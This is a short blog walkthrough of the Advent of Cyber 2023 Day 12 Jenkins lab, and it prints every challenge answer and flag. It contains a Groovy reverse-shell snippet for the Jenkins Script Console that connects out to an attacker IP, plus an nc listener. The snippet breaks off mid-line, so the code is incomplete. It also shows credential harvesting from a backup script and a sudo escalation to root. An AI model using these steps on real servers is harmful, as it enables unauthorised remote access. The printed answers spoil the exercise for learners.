Advent Of Cyber 2023 — Day 12
2 min readDec 12, 2023
What is the default port for Jenkins?
8080What is the password of the user tracy?
- Open the Jenkins panel on a new tab
http://MACHINE_IP:8080 - Click on “Manage Jenkins” > Scroll to the bottom of the page and paste the following script under “Script Console”
String host="attacking machine IP here";
int port=6996;
String cmd="/bin/bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new- Open a new terminal to setup a reverse shell connection:
nc -nvlp 6996 - Click “run” on the Jenkins panel
- Now, there should be a connection on your terminal
- View the back file to get the SSH credentials:
cat /opt/scripts/backup.sh
13_1n_33What’s the root flag?
- Login in Tracy’s account using the credentials found in backup.sh
- switch user to root:
sudo su - read the flag from the root directory:
cat /root/flat.txt
ezRo0tW1thoutDiDWhat is the error message when you login as tracy again and try sudo -l after its removal from the sudoers group?
- Delete Tracy’s user:
sudo deluser tracy sudo - close the SSH connection & login again
- type the following command to see the error:
sudo -l -U tracy
Sorry, user tracy may not run sudo on jenkinsWhat’s the SSH flag?
- Using the SSH connection, view the sshd_config file to get the flag:
cat /etc/ssh/sshd_config
Ne3d2SecureTh1sSecureSh31lWhat’s the Jenkins flag?
- Navigate to Jenkin directory:
cd /var/lib/jenkin - read the xml backup file:
cat config.xml.bk
FullTrust_has_n0_Place1nS3cur1tyThat’s it | Visit mansoorbarri.com for other hacking & IT related articles.
